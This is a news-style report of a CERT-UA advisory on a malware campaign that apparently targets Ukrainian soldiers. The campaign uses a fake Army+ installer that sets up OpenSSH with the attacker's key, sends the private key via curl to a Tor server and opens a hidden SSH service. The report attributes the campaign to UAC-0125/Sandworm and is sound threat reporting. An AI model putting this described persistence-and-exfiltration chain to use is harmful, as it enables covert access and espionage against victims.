The Computer Emergency Response Team of Ukraine (CERT-UA) has spotted a malicious campaign targeting Ukrainian military personnel, which is exploiting Cloudflare Workers to distribute malware disguised as a legitimate mobile application Army+. The app was originally introduced by Ukraine’s Ministry of Defense in August 2024 to facilitate paperless processes within the armed forces.
Victims are lured to fraudulent websites hosted via Cloudflare Workers, where they are prompted to download a Windows executable version of Army+ labeled "ArmyPlusInstaller-v.0.10.23722.exe." The installer is crafted using the Nullsoft Scriptable Install System (NSIS), a common open-source tool for creating Windows installers.
When executed, the installer launches a decoy file to mask its malicious behavior and executes a PowerShell script designed to install an OpenSSH server on the victim’s machine, generate an RSA key pair for secure communication, add the attacker’s public key to the "authorized_keys" file to enable remote authentication, exfiltrate the private key using curl to a remote server hosted on the Tor network, publish a hidden SSH service on the victim's device via Tor.
CERT-UA has linked this activity to UAC-0125 with a high level of confidence, further associating it with the larger cluster UAC-0002 (commonly referred to as APT44 or Sandworm). Sandworm is a notorious cyber-espionage group linked to Russian intelligence services.
This is not the first time the group has targeted Ukrainian entities. Earlier in 2024, UAC-0125 leveraged trojanized Microsoft Office packages, including "Office16.iso" files, as a primary compromise vector. These files contained malicious components, such as "omas-x-none.msp" and "CommunicatorContentBinApp.cmd," which executed PowerShell commands to initiate further infections.